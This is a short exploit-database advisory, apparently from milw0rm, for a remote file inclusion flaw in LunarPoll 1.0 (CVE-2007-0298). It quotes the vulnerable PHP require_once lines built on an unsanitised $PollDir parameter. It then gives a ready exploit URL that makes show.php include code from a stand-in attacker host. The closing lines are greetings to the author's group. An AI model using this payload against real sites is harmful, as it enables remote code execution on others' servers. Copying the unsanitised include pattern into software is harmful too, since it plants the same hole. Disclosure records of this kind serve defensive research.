LunarPoll 1.0 - 'show.php?PollDir' Remote File Inclusion
Author: ilker Kandemir
type: webapps
platform: php
port:
date_added: 2007-01-11
date_updated:
verified: 1
codes: OSVDB-31639;CVE-2007-0298
tags:
aliases:
screenshot_url:
application_url:
-------------------------------------------------------------------------------------------------------------------
AYYILDIZ.ORG PreSents...
Script:LunarPoll
Script Download: dexxaboy.com/scripts/lunarpoll/download/
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
Code:
require_once($PollDir.'/includes/functions.php');
require_once($PollDir.'/includes/IO.php');
-------------------------------------------------------------------------------------------------------------------
Exploit: show.php?PollDir=http://attacker.txt?
-------------------------------------------------------------------------------------------------------------------
Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR
Special Tnx: AYYILDIZ.ORG
# milw0rm.com [2007-01-12]